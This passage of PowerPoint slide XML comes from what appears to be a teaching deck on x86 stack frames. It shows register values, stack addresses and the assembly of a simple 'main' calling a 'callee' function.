                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>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r h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483bf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843804" y="-6543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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843803" y="3961502"/>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0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="105436" y="4546650"/>
          <a:ext cx="3696160" cy="1892920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1848080">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1848080">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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eax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas"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Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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edx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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esp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2"/>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ebp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2b0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="378584">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048397</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4809074" y="190041"/>
            <a:ext cx="6225066" cy="5514761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="2"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80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</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0xc(</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0x8(</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edx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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%edx</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,1),</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add $0x1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  pop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r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</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push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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x18,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</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$0x28,0x4(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,(</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esp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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0x4(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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -0x4(</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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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  leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</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0x8048394</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048395</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048397</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804839a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804839d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483ab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483b3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483ba</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483bf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483c2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483c5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483c6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826439" y="113810"/>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0xfd2d4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="3565137"/>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
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826438" y="458234"/>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0xfd2d0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826437" y="2681749"/>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0xfd2b8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826436" y="234233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0xfd2bc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826435" y="3037968"/>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0xfd2b4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826433" y="3394187"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="1156159"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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00" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
